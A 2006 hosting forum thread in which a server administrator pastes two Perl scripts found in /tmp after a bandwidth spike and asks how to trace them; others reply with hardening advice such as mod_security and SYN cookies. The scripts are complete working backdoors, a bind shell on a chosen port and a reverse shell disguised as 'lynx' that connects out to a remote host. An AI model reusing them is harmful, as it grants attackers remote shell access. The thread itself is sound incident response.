The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

bandwidth to the roof: suspicious files in tmp

Discussion in 'General Discussion' started by Secret Agent, Feb 7, 2006.

Thread Status:
Not open for further replies.
  1. Secret Agent

    Secret Agent Guest

    #!/usr/bin/perl
    $SHELL="/bin/bash -i";
    if (@ARGV < 1) { exit(1); }
    $LISTEN_PORT=$ARGV[0];
    use Socket;
    $protocol=getprotobyname('tcp');
    socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
    setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
    bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
    listen(S,3) || die "Cant listen port\n";
    while(1)
    {
    accept(CONN,S);
    if(!($pid=fork))
    {
    die "Cannot fork" if (!defined $pid);
    open STDIN,"<&CONN";
    open STDOUT,">&CONN";
    open STDERR,">&CONN";
    exec $SHELL || die print CONN "Cant execute $SHELL\n";
    close CONN;
    exit 0;
    }
    }



    filename: /tmp/bdpl


    root@server2 [~]# stat /tmp/bdpl
    File: `/tmp/bdpl'
    Size: 612 Blocks: 8 IO Block: 4096 regular file
    Device: 700h/1792d Inode: 1242 Links: 1
    Access: (0644/-rw-r--r--) Uid: ( 99/ nobody) Gid: ( 99/ nobody)
    Access: 2006-02-07 16:26:35.000000000 -0600
    Modify: 2006-02-02 13:26:10.000000000 -0600
    Change: 2006-02-02 13:26:10.000000000 -0600


    root@server2 [~]# grep bdpl /usr/local/apache/domlogs/*
    -bash: /bin/grep: Argument list too long



    #!/usr/bin/perl
    use Socket;
    $cmd= "lynx";
    $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
    $0=$cmd;
    $target=$ARGV[0];
    $port=$ARGV[1];
    $iaddr=inet_aton($target) || die("Error: $!\n");
    $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
    $proto=getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr) || die("Error: $!\n");
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    open(STDERR, ">&SOCKET");
    system($system);
    close(STDIN);
    close(STDOUT);
    close(STDERR);

    file name: /tmp/back


    root@server2 [/tmp]# stat /tmp/back
    File: `/tmp/back'
    Size: 541 Blocks: 8 IO Block: 4096 regular file
    Device: 700h/1792d Inode: 415 Links: 1
    Access: (0644/-rw-r--r--) Uid: ( 99/ nobody) Gid: ( 99/ nobody)
    Access: 2006-02-07 16:30:55.000000000 -0600
    Modify: 2006-02-03 12:13:14.000000000 -0600
    Change: 2006-02-03 12:13:14.000000000 -0600

    root@server2 [/tmp]# grep back /usr/local/apache/domlogs/*
    -bash: /bin/grep: Argument list too long


    Bandwidth spike screenshot attached

    How do I trace this and stop it? I do have iptraf installed also

    Specs:
    Centos 4.2
    Cpanel 10.x
    PHP 4.4.2
    Apache 1.33
    Suexec enabled

    Some security measures to name a few:

    APF
    BFD
    LSM
    SIM
    MOD_DOSEVASIVE
    RKHUNTER
    CHKROOTKIT
    SECURED TMP
     

    Attached Files:

    • ss.gif
      ss.gif
      File size:
      7.4 KB
      Views:
      112
  2. elliotcooper

    elliotcooper Well-Known Member
    PartnerNOC

    Joined:
    May 18, 2005
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    The file is almost certainly a DOS script that has been dumped into /tmp and or /var/tmp by a badly coded php script. You should kill all the processes as they are chewing up your bandwidth and making someone elses life hard as well.

    If you grep your logs for any wget's or inclusions from some free site providers, geocities.com s seems to be popular choice, and you will probably find the user responsible for the script script that is being hijacked.

    The easiest meathod to avoid this is to implement mod_sec as with the default rule set as this will screen most of the malicious URL's before they can dump these files into your /tmp and /var/tmp.
     
  3. aromal

    aromal Registered

    Joined:
    Sep 5, 2002
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    If your server doesnt host any php applications which uses zend optimizer then you can install hardened php on your server which can prevent many vulnerabilities in the existing php code.

    If you are running any version <= 4.3.11 make sure you upgrade to the latest version 4.4.2 as the older versions are very vulnerable to attacks.

    Also enable mod_security on the server and add rules which can prevent sql injection, cross scripting and buffer overflow attacks.

    Also check if SYN cookies are enabled on the server to guard against ddos.

    cat /proc/sys/net/ipv4/tcp_syncookies

    It should show 1, if not you can use sysctl to enable it.
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Please don't dig up old threads.
     
Loading...
Thread Status:
Not open for further replies.

Share This Page